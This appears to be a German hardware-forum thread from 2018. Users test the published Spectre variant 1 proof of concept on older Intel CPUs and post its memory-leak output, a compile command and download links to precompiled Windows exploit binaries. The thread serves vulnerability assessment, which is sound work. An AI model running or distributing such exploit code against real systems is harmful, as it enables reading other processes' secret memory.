Realer Test auf spectre variant 1

kisser · 24. Januar 2018

Hallo liebe Freunde aktueller Sicherheitslücken.

Da die Informationslage bzgl. betroffener CPUs nach wie vor dürftig ist, schlage ich vor, den von den Grazer Forscher veröffentlichen PoC (siehe letzte Seiten https://spectreattack.com/spectre.pdf) auf einer Vielzahl von CPUs zu testen.

Der PoC liegt derzeit nur im Quellcode vor, so dass man den selbst kompilieren muss, ggf. würde ich eine kompilierte Version auf Anfrage zur Verfügung stellen.

Insbesondere von Interesse sind hier ältere Systeme aus den Jahren 1995 bis 2007 (Intel P6 Architektur und neuer bzw. AMD K6 und neuer), weil ich dazu bis jetzt keine Infos finden konnte.

Testergebnisse neuerer CPUs finden sich hier: (dort kann man auch den Quellcode herunterladen)
https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6

Ich mache mal den Anfang:

Intel Core 2 Quad (Q9400): verwundbar.
Mit modifiziertem Quellcode folgende Ausgabe des Programms (einzelne Zeichen immer noch fehlerhaft)

Reading 40 bytes:
Reading at malicious_x = FFFFF0E8... Success: 0x68='h' score=29 (second best: 0x0D score=12)
Reading at malicious_x = FFFFF0E9... Success: 0x68='h' score=2
Reading at malicious_x = FFFFF0EA... Success: 0x00='?' score=8 (second best: 0x0E score=2)
Reading at malicious_x = FFFFF0EB... Success: 0x4D='M' score=2
Reading at malicious_x = FFFFF0EC... Success: 0x61='a' score=13 (second best: 0x0E score=4)
Reading at malicious_x = FFFFF0ED... Success: 0x67='g' score=2
Reading at malicious_x = FFFFF0EE... Success: 0x69='i' score=11 (second best: 0x0E score=3)
Reading at malicious_x = FFFFF0EF... Success: 0x63='c' score=9 (second best: 0x0E score=2)
Reading at malicious_x = FFFFF0F0... Success: 0x20=' ' score=2
Reading at malicious_x = FFFFF0F1... Success: 0x57='W' score=2
Reading at malicious_x = FFFFF0F2... Success: 0x6F='o' score=21 (second best: 0x06 score=8)
Reading at malicious_x = FFFFF0F3... Success: 0x6F='o' score=2
Reading at malicious_x = FFFFF0F4... Success: 0x64='d' score=9 (second best: 0x06 score=2)
Reading at malicious_x = FFFFF0F5... Success: 0x73='s' score=59 (second best: 0x00 score=26)
Reading at malicious_x = FFFFF0F6... Success: 0x20=' ' score=2
Reading at malicious_x = FFFFF0F7... Success: 0x61='a' score=2
Reading at malicious_x = FFFFF0F8... Success: 0x72='r' score=2
Reading at malicious_x = FFFFF0F9... Success: 0x65='e' score=2
Reading at malicious_x = FFFFF0FA... Success: 0x20=' ' score=7 (second best: 0x08 score=1)
Reading at malicious_x = FFFFF0FB... Success: 0x53='S' score=2
Reading at malicious_x = FFFFF0FC... Success: 0x71='q' score=2
Reading at malicious_x = FFFFF0FD... Success: 0x71='q' score=2
Reading at malicious_x = FFFFF0FE... Success: 0x65='e' score=2
Reading at malicious_x = FFFFF0FF... Success: 0x61='a' score=7 (second best: 0x0E score=1)
Reading at malicious_x = FFFFF100... Success: 0x6D='m' score=2
Reading at malicious_x = FFFFF101... Success: 0x69='i' score=2
Reading at malicious_x = FFFFF102... Success: 0x73='s' score=2
Reading at malicious_x = FFFFF103... Success: 0x68='h' score=15 (second best: 0x0D score=5)
Reading at malicious_x = FFFFF104... Success: 0x20=' ' score=17 (second best: 0x0D score=6)
Reading at malicious_x = FFFFF105... Success: 0x20=' ' score=9 (second best: 0x0E score=2)
Reading at malicious_x = FFFFF106... Success: 0x73='s' score=2
Reading at malicious_x = FFFFF107... Success: 0x73='s' score=2
Reading at malicious_x = FFFFF108... Success: 0x69='i' score=33 (second best: 0x0E score=14)
Reading at malicious_x = FFFFF109... Success: 0x66='f' score=2
Reading at malicious_x = FFFFF10A... Success: 0x72='r' score=105 (second best: 0x08 score=50)
Reading at malicious_x = FFFFF10B... Success: 0x72='r' score=37 (second best: 0x08 score=16)
Reading at malicious_x = FFFFF10C... Success: 0x67='g' score=23 (second best: 0x0C score=9)
Reading at malicious_x = FFFFF10D... Success: 0x65='e' score=2
Reading at malicious_x = FFFFF10E... Success: 0x2E='.' score=2
Reading at malicious_x = FFFFF10F... Success: 0x2E='.' score=2

Kurzversion des Tests:
https://www.sendspace.com/file/99s50r

Prüfsummen:
Datei: Spectre_PoC_short.exe
CRC-32: 9de127e5
MD4: 9085c5d5d10fd0fbf68313f8d399d188
MD5: 91319a68aa5fa9d606c026871010e0d3
SHA-1: 4fce2e705f81307698f0c8b93254485e850d028d

Langversion des Tests (längere Laufzeit, prüft mehrfach, den Speicher auszulesen):
https://www.sendspace.com/file/dv2mi8

Prüfsummen:
Datei: Spectre_PoC_long.exe
CRC-32: f9bfe727
MD4: 568cfd586b29a97915245e58892bdba6
MD5: 91044e1e6479edd49eb766455b2b0eb7
SHA-1: 5d7ee503acad8e44e95019b00539207cefdeaca8

Xero261286 · 24. Januar 2018

Hätte hier einen Pentium D 630, allerdings keine Ahnung vom kompilieren...

L0g4n · 24. Januar 2018

Hab hier nur modernere Intel CPUs (Core-i Architektur), hab bei denen das schon ausprobiert und bestätigen können (ist ja kein Wunder).
@Xerox261286: Du brauchst einen C-Compiler, unter Linux einfach

Code:

gcc -o outputfilename spectre.c

Unter Windows kannst du das genauso machen, wenn du das Linux Subsystem drauf hast (oder du benutzt MSVC).

kisser · 24. Januar 2018

Hehe, die AV-Software-Hersteller schlafen nicht.
Gerade nochmal kompiliert, das meldet sich doch Avast.

Ich werd mal schauen, ob ich das Prog irgendwo hochladen kann. Moment.

Links siehe oben.
Ist natürlich für windows, kompiliert mit MSVC2017.

Xero261286 · 24. Januar 2018

Pentium D 630 CPU:

Reading 40 bytes:
Reading at malicious_x = FFFFF0E8... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0E9... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0EA... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0EB... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0EC... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0ED... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0EE... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0EF... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0F0... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0F1... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0F2... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0F3... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0F4... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0F5... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0F6... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0F7... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0F8... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0F9... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0FA... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0FB... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0FC... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0FD... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0FE... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF0FF... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF100... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF101... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF102... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF103... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF104... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF105... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF106... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF107... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF108... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF109... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF10A... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF10B... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF10C... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF10D... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF10E... Success: 0xFF='?' score=0
Reading at malicious_x = FFFFF10F... Success: 0xFF='?' score=0

Der längere Test ist der selbe wie der kleine.

kisser · 24. Januar 2018

Konsole öffnen und darüber das Programm starten.

/edit. you´re 2 fast 4 me.

Ergänzung (24. Januar 2018)

Und unter Linux läuft das bei dir? Seltsam.

Xero261286 · 24. Januar 2018

Auf der Pentium Mühle läuft kein Linux, nur Windows 7 x64.

kisser · 24. Januar 2018

Ah, das hab ich ganz übersehen.
Also Pentium D 630 evtl. nicht betroffen
(unklar, weil man ja nicht auf generelle Nicht-Existenz der Lücke prüfen kann, evtl. sind nur einige Parameter im Programm wie der "Cache_Hit_Treshold" unpassend).

Xero261286 · 24. Januar 2018

Ich habe auch noch 2 Pentium 4 PCs hier stehen, die werte editiere Morgen oben in meinen Beitrag rein.

kisser · 25. Januar 2018

Test auf Atom N455 erfolglos. Vermutlich nicht betroffen.

Suche

Realer Test auf spectre variant 1

kisser

Admiral

Xero261286

Commodore

L0g4n

Lieutenant

kisser

Admiral

Anhänge

Xero261286

Commodore

kisser

Admiral

Xero261286

Commodore

kisser

Admiral

Xero261286

Commodore

kisser

Admiral

Ähnliche Themen

Passend zum Thema

AMD Epyc 9755 (Turin) 128 Zen-5-Kerne knacken 100K im CPU-Z Benchmark

AMD Ryzen 9000 Verkaufsstart wegen Qualitätsproblemen auf August verschoben

Ryzen AI 9 HX 375 AMD macht die 55-TOPS-APU offiziell